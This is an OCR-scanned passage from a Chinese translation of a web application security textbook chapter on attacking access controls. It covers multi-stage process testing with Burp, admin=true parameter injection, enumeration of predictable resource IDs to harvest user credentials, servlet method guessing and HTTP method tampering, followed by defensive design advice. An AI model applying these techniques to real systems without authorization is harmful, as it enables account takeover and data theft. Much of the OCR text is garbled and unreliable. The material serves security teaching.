尝试 访问 
http://mdsec.net/auth/471/ 








渗透 测试 步 双 





(1) 在 以 多 步骤 方式 执行 某 个 操作 ， 需 要 从 客户 端 癌 服务 需 提 交 几 个 不 同 的 请 求 时 ， 应 单 
独 测试 每 一 个 请 求 ， 以 确定 是 否 已 对 这 些 请 求 应 用 了 访问 控制 。 应 确保 测试 每 一 个 请 求 , 包括 
表单 提交 、 重 定 和 加， 以 及 任何 非 参 数 化 的 请 求 。 

(2) 答 试 发 现 应 用 程序 硝 定 你 是 否 到 达 特 定 阶 段 〈 必须 通过 合法 的 途径 到 达 该 阶段 ) 的 任 
何 位 置 。 尝 试 使 用 权限 较 低 的 账户 到 达 该 阶段 ， 检 测 是 否 可 以 实施 任何 权限 提升 攻击 。 

(3) 手动 执行 这 种 测试 的 一 种 方法 ， 是 在 浏览 带 中 多 次 完成 受 保护 的 多 阶段 过 程 ， 并 使 用 








198 第 8 章 攻击 访问 控制 


代理 服务 需 将 在 不 同 请 求 中 提供 的 会 话 令 牌 切换 为 权限 较 低 的 用 户 的 令 牌 。 
(4) 通过 使 用 Burp Suite 的 “浏览 妖 中 的 请 求 ”( request in browser ) 功能 ， 可 以 显著 加 快 这 
0 
(a) 使 用 权限 较 高 的 账户 过 历 整 个 多 阶段 过 程 。 
(b) 使 用 权限 较 低 的 账户 〈 或 根本 不 使 用 账户 ) 登录 应 用 程序 。 
(c) 在 Burp Proxy 的 历史 记录 中 ， 找 到 权限 较 高 的 用 户 执 行 多 步骤 过 程 时 提出 的 请 求 序 
列 。 对 于 序列 中 的 每 个 请 求 ， 选 择 “ 当 前 浏览 硕 会 话 在 浏览 锅 中 的 请 求 ”(request in 
browser in current browser session ) 上 下 文 沫 单项 〈 如 图 8-4 所 示 )。 将 提供 的 URL 粘 
贴 到 以 权限 较 低 的 用 户 吴 份 登录 的 浏览 硕 中 。 
(d) 如 有 果 应 用 程序 允许 ， 则 使 用 浏览 妖 以 正常 方式 完成 镜 下 的 多 阶段 过 程 。 
(e) 查看 浏览 妖 和 代理 服务 大 历 史记 录 中 的 结果 ， 确定 是 否 可 以 成 功 执 行 特 权 操 作 。 
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target proxy | spider | scanner | intruder | repeater | sequencer decoder comparer | options | alerts | 














intercept | options | tistory | 
























Filter: hiding out of scope items; hiding CSS, image and general binary content 
host _ | params|. mod | status | length IM | 
让 |https:W limdsecnet jeer auth/471/ 二 时 Tm | i l200 T1477 Ha 
48 ”https: limdsec. net [POST l/auth/471/Default.ashx | | | |302 < |553 用 | 
49 |https:/mdsecnet |GET Iauth/471Home ashx | 草 加 |200 [1331 | 
51 _lhitps://mdsecnet IGET |/auth/47 1/Admin.ashx | 国 | 图 |200 |1254 上 H | 
52 Ihttps/imdsec. net IGET |/auth/471/NewUser.ashx [ D L200 |1987 IH | 













十 cn | FE 
https://mdsec.netiauth/471/NewUserStep2.ashx 


| remove item from scope 




















| regquest response | 


| raw | params | headers | hex 





spider from here 
actively scan this item 








[Accept -Language: sn-—-gb,en; d=0.5 
Accept-Encodindg: Jzip,deflate passively scan this item 
Accept=Charset: IS50~886859-1 ,utf-8;q=0.7,*;dq=0.7 sendto intruder 

Keep-Alive: 115 


Connection: Se ive sendto repeater 


es https://mdsec.net/auth/471/NewUser .ashx sendito sequencer 
: Se 已 
okie: Sessio td 5B3 El44D4DE E02DEEBF22BSAD sendto comparer (requesi) 
ontent-Type: application/x-www-form-urlencoded 
i 21 sendto comparer (response) 








show response in browser 





realname=Daf&username=daféuserrole=user tpassvword=letmeinlt 




















5B3E144D4DED2DEEBF22B9AOFEEE2BF3 request in browser NN in original session | 
engagement tools ， in current browser session 

Tr I > i 1T 

| t+ | < [> | | Show new history window 














add comment 








图 8-4 使 用 Burp 在 当前 浏览 融会 话 中 请 求 给 定 项 


当 你 对 指定 的 请 求 选择 Burp 的 “当前 浏览 此 会 话 在 浏览 絮 中 的 请 求 ” 功 能 时 ，Burp 会 癌 你 提 
供 一 个 指定 Burp 的 内 部 Web 服 务 器 的 唯一 URL， 然 后 ,将 这 个 URL 粘 贴 到 浏览 器 的 地 址 栏 中 。 当 
你 在 浏览 硕 中 请 求 这 个 URL 时 ，Burp 将 返回 一 个 指 回 最 初 指 定 的 UREL 的 重 定 癌 。 浏 览 需 访 问 该 重 
定 回 时 ，Burp 将 用 最 初 指定 的 请 求 蔡 换 该 请 求 ， 同 时 保持 cookie 消 息 头 不 变 。 如 果 正 测试 不 同 
的 用 户 账 户 ， 可 以 加 快 这 个 过 程 。 以 不 同 用 户 登 录 几 个 不 同 的 浏览 各 ， 并 将 上 述 URL 粘 贴 到 每 个 
浏览 硕 中 ， 看 应 用 程序 如 何 处 理 使 用 不 同 浏览 带 登 录 的 用 户 的 请 求 。 (需要 注意 的 是 ， 由 于 同一 
浏览 大 通 常会 在 不 同窗 口 之 间 共 享 cookie， 因 此 ， 在 执行 这 个 测试 时 ， 需 要 使 用 不 同 的 浏览 絮 产 
间 ， 或 安装 在 不 同 机 器 上 的 浏览 帮 。) 























8.2 ”攻击 访问 控制 199 


提示 “以 不 同 的 用 户 账户 测试 多 阶段 过 程 时 ， 检 查 不 同 用 户 逐 个 提出 的 请 求 的 序列 有 
WU 助 于 确定 有 利于 进一步 调查 的 细微 差异 。 
如 果 使 用 不 同 浏览 器 以 不 同 用 户 身份 访问 应 用 程序 ， 可 以 在 Burp 中 创建 供 每 个 浏 


先 器 使 用 的 不 同 代理 监听 器 ( 需要 在 每 个 浏览 器 中 更 新 代理 服务 器 配置 ， 以 指向 相关 
听 器 )。 然后， 对 于 每 个 浏览 器 ,使 用 代理 服务 器 历史 记录 中 的 上 下 文 菜单 打开 新 的 
历史 记录 窗口 ， 并 将 显示 过 滤器 设置 为 仅 显 示 相 关 代 理 监 听 器 提出 的 请 求 。 


I 人 





8.2.3 通过 有 限 访问 权限 进行 测试 


如 果 只 有 一 个 用 户 级 账户 可 用 于 访问 应 用 程序 或 根本 没有 任何 账户 )， 这 时 ， 要 测试 访问 
控制 的 效率 ,还 需要 完成 其 他 工作 。 实 际 上 ， 无 论 在 什么 情况 下 ， 要 想 执行 全 面 彻 的 的 测试 ， 属 
需要 完成 其 他 工作 。 在 应 用 程序 中 ， 可 能 存在 一 些 未 受到 严格 保护 的 功能 ， 而 且 任 何 用 户 界 面 均 
未 明确 提供 这 些 功能 的 链接 。 例 如 ， 可 能 有 一 些 旧 功 能 尚未 删除 ， 或 者 新 功能 已 部 署 但 未 回 用 户 
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渗透 测试 步 双 


() 使 用 第 4 童 介绍 的 内 容 碍 找 技巧 确定 尽 可 能 多 的 应 用 程序 功能 。 通 稼 ， 以 权限 较 低 的 用 





户 进行 查找 就 足以 枚 举 并 和 二 接 访问 敏感 功能 。 

(2) 如 采 确 定 可 能 回 普 通 和 管理 用 户 提 供 不 同 功能 或 链接 的 应 用 程序 页 面 ( 例如, “控制 面 
板 ” 或 “我 的 主页 ”), 尝试 在 URIL 查 询 字符 串 和 PosT 请 求 主体 中 插入 adqmin=true 之 类 的 参数 ， 
确定 这 样 做 是 否 可 发 现 或 访问 任何 其 他 你 所 拥有 的 用 户 权限 正常 无 法 访问 的 功能 。 

(3) 测试 应 用 程序 是 否 基于 Referez 消 息 头 做 出 访问 控制 决策 。 对 于 获得 授权 访问 的 关键 
应 用 程序 功能 , 答 试 删除 或 修改 Referez 消 息 头 并 确定 是 否 仍然 能 够 成 功 提 出 请 求 。 如 采 不 能 ， 
应 用 程序 可 能 以 某 种 不 安全 的 方式 信任 Referer 消 息 头 。 如 果 使 用 Burp 的 主动 扫描 器 扫描 请 
求 , Burp 会 答 试 删除 每 个 请 求 的 Referez 消 息 头 , 并 通知 你 这 样 做 是 否 会 在 应 用 程序 的 啊 应 中 
造成 对 应 的 相关 差异 。 

(4) 检查 所 有 客户 剖 HTML 与 脚本 ,查找 隐 藏 功能 或 可 从 客户 端 进 行 操 纵 的 功能 的 引用 ， 
如 基于 脚本 的 用 户 界 面 。 同 时 ， 反 编 详 第 5 草 中 介绍 的 所 有 浏 宽 带 扩 展 组 件 ， 查 找 任何 服务 奋 
曾 功 能 的 引用 。 
































尝试 访问 
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http://mdsec.net/auth/472/ 
http://mdsec.net/auth/466/ 








一 旦 枚 举 出 所 有 可 访问 的 功能 , 就 有 必要 测试 应 用 程序 是 否 正确 划分 每 名 用 户 访问 欣 源 的 权 
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限 。 如 朵 应 用 程序 允许 用 户 访问 一 组 内 容 广 沁 的 相同 类 型 的 资源 ( 如 文档 、 订 单 、 电 子 邮 件 和 个 
人 资料 )， 则 用 户 就 有 机 会 未 授权 访问 其 他 资源 。 





渗透 测试 步 双 


(1) 无 论 应 用 程序 使 用 何 种 标识 符 (文档 ID、 账 号 、 订 单 引 用 每 ) 指定 用 户 所 请 求 的 资源 ， 








应 尝试 找到 没有 权限 访问 的 资源 的 标识 从 。 

(2) 如 采 有 可 能 生成 一 系列 紧密 相连 的 标识 符 ( 例如 ,通过 创建 几 个 新 文档 或 订单 )， 则 可 
以 使 用 我 们 在 第 7 章 描述 的 针对 会 话 令 牌 的 技巧 ， 答 试 在 应 用 程序 生成 的 标识 符 中 查找 任何 可 
预测 的 序列 。 

(3) 如 有 果 无 法 生成 任何 新 标识 符 ， 那 么 只 能 通过 分 析 已 经 发 现 的 标识 符 ， 或 纯粹 使 用 猜测 
方法 碍 找 标识 待 。 如 采 标 识 符 为 GUID 形 式 ， 则 基于 猜测 的 答 试 将 无 法 取得 成 功 。 但 是 ， 如 采 
标识 符 是 一 个 相对 较 小 的 数字 , 则 可 以 尝试 使 用 与 它 相 差 不 大 的 为 一 个 数字 , 或 数字 位 相同 的 
为 一 个 随机 数学。 

(4) 如 有 果 发 现 访问 控制 并 不 完善 ， 而 且 资 源 标 识 符 可 以 预测 ， 可 以 发 动 日 动 攻击 获取 应 用 
程序 的 敏感 资源 和 信息 。 可 以 使 用 在 第 14 章 描述 的 技巧 , 设计 一 次 定制 日 动 攻 击 , 以 获取 所 知 
的 数据 。 

如 果 “ 账 户 信息 ”页 面 在 显示 用 户 个 人 资料 的 同时 还 显示 他 的 用 户 名 和 和 密码， 则 这 种 漏洞 
可 能 会 造成 灾难 性 的 后 琳 。 虽 然 输入 的 密码 在 屏幕 上 隐藏 显示 , 但 它 仍然 以 明文 形式 传送 至 济 
响 船 。 因 此 , 通 妆 可 以 快速 遍历 账户 标识 从 的 所 有 可 能 值 荡 围 ， 从 而 获得 所 有 用 户 ,， 包括 管理 
员 的 登录 证 书 。 图 8-5 说 明了 如 何 使 用 Burp Intruder 成 功 执行 这 种 攻击 。 



















































































, intruder attack 1 [ 王 帮 硬 -| 区 到 
attack Save columns 
Filter: showing allitems 
| results | target | positions | payloads options 
| _status | error ltimeo..! length |Username..,Password:.. comment 
200 li |1371 lindsay swords || 
| | | | 人 
200 | |1362 jeff orange | 三 | 
FA 本 YE | Sa 
200 | [DD | DD Il1362 ladmin lpwned | 
i200 | li | | 11361 ladam Inuwcent 
i1200 | | | |1360 Itestuser ltest lIbaseline request 
I200 | iil | 加 |1359 Ipablina lIpuntita | 
1200 | | 剧 |1359 Iherman |gomaddiet | 
i200 | | ml |1358 Iweiner Iskinthird | 
200 | 加 | 加 14358 |bazzer |beboslu7s | 
request | response | 
[ raw | headers | hex | html | render | 
align="ridght" ></td></tr></table><table border="1" bygcolor="#000000" | 全 |]| 
bordercolor="#000000" ce1l1lspaclinc="0"” cellpadding="DO"width="100$" 
style="]horder-collapse: collapse"><tr><td></td></tr></table><br/> 
<talble border="0O"><tr><td>HMame: 
</td><td>Administrator</td></tr><tr><td>Username: 
</td><td>admin</td></tr><tr><td>Password: < /td><td>pwnedk /td></tr><tr><td>VUid: | 
td><td>79</td></t t td>Role: | 
tco><td>Administrator</td t ta } a .可 
href="Home .ashx ">Hom ] | html 
一 
+ | <||> 0 matches| 
lfinished [ | 

















图 8-5 一 次 通过 访问 控制 源 洞 获取 用 户 名 和 密码 的 成 功 攻 击 
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尝试 访问 
http://mdsec.net/auth/488/ 
http://mdsec.net/auth/494/ 


提示 “如果 检测 到 访问 控制 漏洞 ， 可 以 立即 发 动 一 次 攻击 ， 尝 试 通过 攻破 一 个 具有 管 
Y 理 权限 的 用 户 账 户 来 进一步 提升 自己 的 权限 。 可 以 通过 各 种 技巧 查找 管理 账户 。 利 用 
上 面 介 绍 的 访问 控制 缺陷， 可 以 获得 数 百 个 用 户 证 书 ， 并 尝试 手动 登录 每 一 个 账户 ， 
直到 找到 管理 员 账 户 。 但 是 ， 如 果 账 户 以 连续 的 数字 ID 为 标识 符 ， 则 应 用 程序 通常 会 
将 最 小 的 数字 账户 分 配给 管理 员 。 登 录 几 个 最 先 注册 的 用 户 ， 往往 就 可 以 确定 应 用 程 


序 管 理 员 账 户 。 如 果 这 种 方法 不 可 行 ， 一 种 有 效 的 方法 是 在 应 用 程序 中 查找 其 访问 权 
限 被 水 平 隔离 的 功能 一 一 例如 ， 向 每 名 用 户 呈 现 的 主页 。 编 写 一 段 脚 本 ， 使 用 截获 的 
每 个 证 书 登 录 ， 然 后 尝试 访问 自己 的 主页 。 很 可 能 管理 用 户 能 够 查看 每 一 名 用 户 的 主 
页 ， 因 此 ， 如 果 用 于 登录 的 是 管理 账户 ， 你 立即 就 会 发 觉 。 





8.2.4 测试 “直接 访问 方法 ” 


如 果 应 用 程序 使 用 直接 访问 服务 需 端 API 方法 的 请 求 , 正常 情况 下 , 使 用 上 述 技巧 即 可 以 确 
定 这 些 方 法 中 的 任何 访问 控制 漏洞 。 但是, 还 应 该 进行 测试 ， 以 确定 是 否 存 在 其 他 可 能 未 受到 正 
确保 护 的 API。 

以 使 用 下 列 请 求 调用 的 servlet 为 例 : 


POST /sve HTTP/1.1 
Accept-Encoding: gzip, deflate 














Host: wahh-app 


Content-Length: 37 8 


servlet=com.1ibm.ws.webcontainer.httpsession. IBMTrackerDebug 


由 于 这 是 一 个 众所周知 的 servlet， 攻 击 者 可 能 能 够 访问 其 他 servlet 以 执行 未 授权 操作 。 


渗透 测试 步 又 

(1) 确定 任何 遵循 Java 命 名 约定 例如 get Set add update is 或 has 后 接 大 写 单 词 ) 
或 明确 指定 包 结 构 ( 如 com.companyname .xxzx.yyy.CIassName ) 的 参数 。 记 下 所 有 你 能 够 
发 现 的 被 引用 的 方法 。 

(2) 找到 茶 个 列举 可 用 接口 或 方法 的 方法 。 在 代理 服务 硕 历 史记 录 中 进行 搜索 ， 看 应 用 程 








序 的 正常 通信 和 是否 调用 了 该 方法 。 如果 该 方法 未 被 调用 , 则 答 试 使 用 观察 到 的 命名 约定 猜测 该 
方法 。 
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(3) 在 公共 资源 〈 如 搜索 引擎 和 论坛 站 点 ) 中 查找 ， 以 确定 任何 其 他 可 以 访问 的 方法 。 
(4) 使 用 第 4 章 介绍 的 技巧 猜测 其 他 方法 名 称 。 

(5) 尝试 使 用 各 种 用 户 账户 ( 包括 未 授权 访问 ) 访问 收集 到 的 所 有 方法 。 

(6) 如 果 不 知道 某 些 方法 需要 的 参数 的 数量 或 类 型 ， 可 以 寻找 那些 不 大 可 能 使 用 参数 的 方 


法 ， 如 listInterfaces 科 getAllUsersInRoles。 








8.2.5 测试 对 静态 资源 的 控制 
如 朱 受 应 用 程序 保护 的 静态 资源 最 终 可 以 通过 指 回 换 源 文 件 本 身 的 URL 百 接 访 问 , 这 时 你 应 
该 进行 测试 ， 以 确定 未 授权 用 户 是 否 可 以 二 接 请 求 这 些 URL。 

















渗透 测试 步骤 

(1) 吉 历 访问 受 保护 静态 资源 的 正 第 过程 ， 获 取 用 于 最 终 访 问 该 资源 的 URL 示 例 。 

(2) 使 用 不 同 的 用 户 账 户 ( 如 权限 较 低 的 用 户 或 没有 购买 所 需 商 品 的 账户 ), 尝试 使 用 已 确 
定 的 URL 和 直接 访问 该 资源 。 











(3) 如 果 这 种 攻击 取得 成 功 ， 尝 试 了 解 受 保护 的 静态 资源 所 使 用 的 命名 方案 。 如 果 可 能 ， 
设计 一 个 自动 攻击 ， 获 取 可 能 有 用 或 可 能 包含 敏感 数据 的 内 容 ( 请 参阅 第 14 章 )。 
8.2.6 测试 对 HTTP 方 法 实施 的 限制 


虽然 并 没有 现成 的 方法 可 用 于 检测 应 用 程序 的 访问 控制 是 否 对 HTTP 方 法 实施 了 平台 级 控 
制 ， 但是， 可 以 通过 一 些 人 简单 的 步 又 来 确定 任何 疡 洞 。 





渗透 测试 步 又 


(1) 使 用 一 个 权限 较 高 的 账户 ， 确 定 一 些 执行 敏感 操作 的 特权 请 求 ， 如 添加 新 用 户 或 更 改 





用 局 的 安全 角色 的 请求 。 

(2) 如 果 这 些 请 求 未 受到 任何 反 CSRF 令 有 牌 或 类 似 功能 ( 请 参阅 第 13 章 ) 的 保护 ， 可 以 使 用 
权限 较 高 的 账户 确定 ， 如 条 HTTP 方 法 被 修改 ， 应 用 程序 是 否 仍然 执行 请 求 的 操作 。 应 测试 的 
HTTP 方 法 包括 : 

pOST,; 

LI GET ; 

口 HEAD 

口 任何 无 效 的 HTTP 方 法 。 

(3) 如 于 应 用 程序 执行 任何 使 用 与 最 初 的 方法 不 同 的 HITTP 方 法 的 请 求 , 则 应 使 用 上 述 标准 
技巧 ， 通 过 权限 较 低 的 账户 对 针对 这 些 请 求实 施 的 访问 控制 进行 测试 。 
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访问 控制 是 最 容易 理解 的 Web 应 用 程序 安全 领域 , 但 是 在 执行 它们 时 必须 采用 合理 、 全 面 的 
方法 。 

首 乞 应 避免 几 种 明显 的 缺陷 。 出 现 这 些 缺 陷 ， 通 稼 是 由 于 我 们 不 了 解 执 行 有 效 访 问 控制 
应 满足 的 基本 要 求 ， 或 者 对 用 户 应 提出 哪些 请 求 ， 以 及 应 用 程序 需要 防御 哪些 威胁 存在 错误 
的 认识 。 

口 不 要 认为 用 户 不 知道 用 于 指定 应 用 程序 资源 的 URL 或 标识 符 ( 如 账号 和 文档 ID ) 就 无 法 
访问 这 些 资源 。 假 说 用 户 知 道 每 一 个 应 用 程序 的 URL 和 标识 符 ， 确 你 应 用 程序 的 访问 控 
制 足以 防止 未 授权 访问 。 

D 不 要 信任 任何 用 户 提 交 的 表示 访问 权限 的 参数 ( 如 admin=true )。 

口 不 要 认为 用 户 将 按 设 定 的 顺序 访问 应 用 程序 页 面 。 不 要 认为 因为 用 户 无 法 访问 “编辑 用 
户 ” 页 面 ， 他 们 就 不 能 到 达 由 该 页 面 链 接 的 “编辑 用 户 X” 页 面 。 

口 不 要 相信 用 户 不 会 赏 改 通过 客户 端 传送 的 数据 。 如 采用 户 提 交 的 一 些 数 据 已 被 确认 ， 然 
后 通过 客户 问 传 送 ， 不 要 不 经 重新 确认 就 相信 传送 的 值 。 

以 下 是 一 些 在 Web 应 用 程序 中 执行 有 效 访问 控制 的 最 佳 方法 。 

口 仔细 评 佑 并 记录 每 个 应 用 程序 功能 单元 的 访问 控制 要 求 。 这 包括 谁 能 合法 使 用 这 些 功能 ， 
以 及 用 户 通 过 这 些 功能 能 够 访问 哪些 资源 。 

口 通过 用 户 会 话 做 出 所 有 访问 控制 决定 。 

口 使 用 一 个 中 央 应 用 程序 组 件 检 查访 问 控 制 。 

口 通过 这 个 组 件 处 理 每 一 个 客户 端 请 求 , 确认 允许 提出 请 求 的 用 户 访 问 他 请 求 的 功能 和 资源 。 

口 使 用 编程 拉 巧 确保 前 面 的 方法 没有 例外 。 一 种 有 效 的 方法 是 规定 每 个 应 用 程序 页 面 必须 
采用 一 个 由 中 央 访 问 控 制 机 制 查询 的 界面 。 强 制 开 发 者 将 访问 控制 逻辑 代码 号 入 每 个 页 
面 ， 不 得 找 借口 省 略 这 些 代码 。 

口 对 于 特别 敏感 的 功能 , 例如 管理 页 面 ,可 以 通过 IP 地 址 进一步 限制 访问 , 确保 只 有 特殊 网 
络 范 围 内 的 用 户 能 够 访问 这 些 功能 ， 不 管 他 们 是 否 登录 。 

口 如 采 静 态 内 容 需 要 得 到 保护 ， 有 两 种 方法 可 提供 访问 欣 制 。 首 先 ， 用 户 可 通过 回执 行 相 
天 访问 控制 逻辑 的 服务 俘 问 动态 页 面 传送 一 个 文件 名 ， 间 接 访 问 静 态 文件 。 其 次 ， 可 通 
过 使 用 HTTP 验 证 或 应 用 程序 服务 冲 的 其 他 特性 隐藏 进入 的 请 求 ， 并 在 允许 访问 前 检查 资 
源 许可 ， 控 制 用 户 下 接 访 问 静 人 态 文 件 。 

口 无 论 何 时 通过 客户 端 传送 ， 指 定 用 户 所 希望 访问 资源 的 标识 符 部 容易 遭 到 灌 改 。 服 务 右 
应 只 信任 完整 的 服务 带 端 数据 。 任 何 时候 通 过 客户 端 传送 这 些 标 识 符 ， 都 瑚 要 对 它们 进 
行 重新 确认 ， 以 确保 用 户 拥 有 访问 被 请 求 资 源 的 授权 。 

口 对 于 安全 性 很 关键 的 应 用 程序 功能 ( 如 在 银行 应 用 程序 中 创建 一 个 新 的 汇 球 收 蒜 人 ) 考 
虑 对 每 笔 交 易 执 行 重复 验证 和 双重 授权 ， 进 一 步 确 保 该 功能 不 会 被 未 授权 方 使 用 。 这 样 
做 还 可 以 减轻 其 他 可 能 的 攻击 ( 如 会 话 劫持 ) 造成 的 后 来 。 
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口 记录 每 一 个 访问 敏感 数据 或 执行 敏感 操作 的 事件 。 这 些 记 录 有 助 于 检测 并 调查 潜在 的 访 
问 控制 违反 事件 。 

Web 应 用 程序 开发 者 通 弟 逐步 执行 访问 控制 功能 ,在 他 们 发 现 尖 要 访问 控制 的 每 个 页 面 搬入 
代码 , 并 在 不 同 的 页 面 间 剪 切 和 粘贴 相同 的 代码 以 满足 类 似 的 需求 。 这 种 方法 会 在 建立 的 访问 控 
制 机制 中 引入 内 在 的 缺陷 : 许多 需要 访问 控制 的 情况 被 忽略 ; 为 一 个 区 域 设计 的 控制 可 能 并 不 适 
用 于 另 一 个 区 域 ; 在 应 用 程序 其 他 地 方 所 做 的 修改 可 能 会 由 于 违反 开发 者 做 出 的 假设 而 与 现 有 控 
制 机 制 相互 冲突 。 

与 这 种 方法 相 比 ， 前 面 描述 的 使 用 中 央 应 用 程序 组 件 实 施 访问 控制 的 方法 具有 诸多 优点 。 

口 它 可 增进 应 用 程序 访问 控制 的 透明 度 ， 使 得 不 同 开发 者 能 够 迅速 理解 其 他 人 执行 的 控制 

机 制 。 

口 它 可 提高 访问 控制 的 可 维护 性 。 许 多 变更 只 需要 在 一 个 共享 的 组 件 中 应 用 一 次 即 可 ， 不 

需要 将 代码 芒 切 并 粘贴 到 多 个 位 置 。 

口 它 可 改善 可 适应 性 。 如 采 出 现 新 的 访问 控制 要 求 ， 这 些 要 求 可 立即 反映 到 由 每 个 应 用 程 

序 页 面 执行 的 一 个 现 有 API 中 。 
口 它 比 在 整个 应 用 程序 中 逐步 执行 访问 控制 代码 造成 的 错误 和 选 濡 更 少 。 


多 层 权 限 模型 


与 访问 有 关 的 问题 不 仅 适 用 于 Web 应 用 程序 ， 而 且 也 适用 于 其 中 的 其 他 基础 设施 ， 特 别 是 应 
用 程序 服务 占 、 数 据 库 和 操作 系统 。 采取 深层 安全 措施 需要 在 上 述 每 一 个 层面 执行 访问 控制 ， 建 
立 儿 层 保护 。 这 样 做 可 以 强化 对 未 授权 访问 威胁 的 防御 ， 因 为 即使 攻击 者 攻破 一 个 层面 的 防御 ， 
也 会 被 其 他 层面 的 防御 机 制 阻 止 。 
除 上 文 所 述 的 在 Web 应 用 程序 中 执行 有 效 的 访问 控制 外 ,还 可 以 通过 各 种 方式 将 这 种 多 层次 
的 方法 应 用 于 应 用 程序 的 基础 组 件 中 ， 举 例如 下 。 
口 可 根据 在 应 用 程序 服务 做 层面 定义 的 用 户 角色 ， 使 用 应 用 程序 服务 俘 对 完整 URL 路 径 实 
施 访 问 控制 。 
口 当 执 行 其 他 用 户 的 操作 时 ， 应 用 程序 可 使 用 一 个 不 同 的 数据 库 账 户 。 应 为 仅 需 查询 ( 而 
非 更 新 ) 数据 的 用 户 提供 一 个 只 该 权限 账户 。 
D 应 使 用 一 个 权限 表 ， 对 数据 库 中 不 同 的 数据 库 表 执行 严格 的 访问 控制 。 
口 用 于 运行 基础 说 施 中 每 个 组 件 的 操作 系统 账户 只 需 分 配 组 件 实际 需要 的 最 低 权 限 。 
复杂 的 安全 性 能 关键 的 应 用 程序 可 通过 一 个 定义 应 用 程序 不 同 用 户 角 色 和 不 同 权限 的 矩阵 
来 帮助 实施 这 种 多 层 防 御 措 施 。 在 每 一 个 层面 ， 应 将 不 同 的 权限 分 配给 每 一 个 角色 。 图 8-6 是 一 
个 复杂 应 用 程序 的 一 部 分 权限 和 矩阵。 
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应 用 程序 服务 器 应 用 程序 角色 数据 库 权 限 
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es 
NA DIN J 
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图 8-6 一 个 复杂 应 用 程序 权限 矩阵 实例 


我 们 可 以 在 这 种 安全 模型 中 应 用 各 种 有 益 的 访问 控制 概念 。 

口 编程 控制 ( programmatic control )。 数 据 库 权 限 和 矩阵 保存 在 一 个 数据 库 表 中 ， 并 以 编程 的 
形式 来 做 出 访问 控制 决定 。 对 用 户 角 色 进行 分 类 可 以 人 简化 某 些 访问 控制 检查 ， 这 一 任务 
同样 可 以 通过 编程 来 完成 。 编 程控 制 可 能 极其 琐碎 ， 并 可 能 在 应 用 程序 中 建立 非常 复杂 
的 访问 控制 逻辑 。 

口 自主 访问 控制 (Discretionary Access Control，DAC )。 使 用 上 自主 访问 控制 ， 管 理 员 可 将 
日 己 的 权限 分 配给 其 他 与 拥有 特殊 资源 有 关 的 用 户 。 在 封闭 型 DAC 模 型 中 ， 除 非 明确 许 
可 ， 否 则 拒绝 访问 。 管 理 员 还 可 以 锁定 或 终止 某 个 用 户 账户 。 在 开放 型 DAC 模 型 中 ， 除 
韭 明确 废除 许可 ， 否 则 允许 访问 。 各 种 应 用 程序 用 户 有 权 创 建 用 户 账户 ， 并 再 次 应 用 日 
主 访问 控制 。 

口 基于 角色 的 访问 控制 (Role-Based Access Control，RBAC )。 这 种 控制 使 用 许多 命名 的 角 
色 ， 每 个 角色 拥有 各 不 相同 的 特殊 权限 ; 每 个 用 户 分 配 有 一 个 这 样 的 角色 。 这 样 做 可 简 
化 不 同 权 限 的 分 配 与 实施 ， 并 有 助 于 管理 复杂 应 用 程序 中 的 访问 控制 。 使 用 角色 对 用 户 
请 求 执 行 “前 治 ” 访 问 检查 有 助 于 实行 最 少量 的 处 理 迅速 拒绝 许多 未 授权 的 请 求 。 对 特 
殊 用 户 可 访问 的 URL 路 径 加 以 保护 就 是 这 种 方法 的 一 个 典型 应 用 。 

当 设 计 基 于 角色 的 访问 控制 机 制 时 ， 我 们 有 必要 限制 角色 的 数量 ， 以 对 应 用 程序 的 权限 
进行 有 将 管理 。 如 果 建 立 太 多 琐碎 的 角色 ， 那 么 由 于 不 同 角 色 的 数目 索 多 ， 可 能 就 很 难 
对 其 进行 有 效 管 理 。 如 果 建 立 太 少 的 角色 ， 这 些 角 色 就 只 能 对 访问 进行 粗略 管理 ,个 体 
用 户 分 配 到 的 权限 将 不 足以 履行 他 们 的 职能 。 

如 果 使 用 平台 级 控制 、 基 于 HTTP 方 法 和 URL 限 制 对 不 同 应 用 程序 角色 的 访问 ， 则 应 将 这 
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些 控 制 设计 为 使 用 默认 拒绝 模式 ， 因 为 这 是 防火 墙 规 则 的 最 佳 做 法 。 这 其 中 应 包括 各 种 
特定 规则 ， 用 于 将 某 些 HTTP 方 法 和 URL 分 配给 特定 角色 ， 而 且 ， 随 后 的 规则 应 拒绝 不 和 从 
合 前 一 规则 的 任何 请 求 。 

口 声明 式 控 制 (declarative control )。 应 用 程序 使 用 有 限 的 数据 库 账 户 访 问 数 据 库 。 它 对 不 
同 的 用 户 群 体 使 用 不 同 的 账户 ， 每 个 账户 分 配 到 执行 该 群体 所 允许 执行 的 操作 所 必需 的 
最 低 权 限 。 这 种 声明 式 控制 从 应 用 程序 以 外 进行 声明 。 这 是 深层 防御 原理 的 一 个 非常 有 
用 的 应 用 ， 因 为 权限 是 由 男 外 一 个 组 件 赋 了 予 应 用 程序 的 。 这 样 ， 即 使 一 名 用 户 突破 在 应 
用 程序 层面 执行 的 访问 控制 ， 企 图 实施 添加 新 用 户 之 类 的 敏感 操作 ， 他 仍然 会 被 阻止 ， 
因为 他 使 用 的 数据 库 账户 并 未 在 数据 库 内 获得 必要 的 权限 。 

男 一 种 情况 是 在 配置 应 用 程序 的 过 程 中 ， 通 过 配置 描述 从 文件 ( descriptor file ) 在 应 用 程 
序 服务 融 层 面 上 应 用 声明 陈 访问 控制 。 但 是 ， 这 种 应 用 一 般 相 对 简单 ， 并 且 无 法 进行 扩 
展 ， 所 以 无 法 管理 大 型 应 用 程序 中 种 类 繁多 的 权限 。 









































渗透 测试 步 又 


如 果 攻 击 一 个 采用 这 种 多 层 权限 模型 的 应 用 程序 , 可 能 这 个 应 用 程序 能 够 防御 在 应 用 访问 








制 过 程 中 关 犯 的 许多 明显 错误 。 由 于 在 其 他 层面 实施 的 保护 措施 , 避 开 应 用 程序 的 访问 控制 
能 无 法 取得 很 大 成 效 , 但 仍然 可 以 使 用 其 他 可 能 的 攻击 手段 。 更 重要 的 是 ， 了 解 每 种 控制 在 
所 能 提供 的 保护 方面 存在 的 限制 ， 将 有 助 于 确定 最 可 能 影响 到 它 的 漏洞 。 

D 应 用 程序 层面 的 编程 检查 易于 受到 注入 类 攻击 。 

口 在 应 用 程序 服务 融 层 面 定义 的 角色 ， 其 定义 既 不 全 面 ， 也 不 完整 。 

口 即使 使 用 低 权 限 操作 系统 账户 运行 应 用 程序 组 件 ， 这 些 账 户 通 稼 仍然 能 够 阅读 主机 文 
件 系统 中 保存 的 各 种 敏感 数据 。 任 何 准许 他 人 访问 任意 文件 的 漏洞 《即使 仅仅 谈 取 敏 
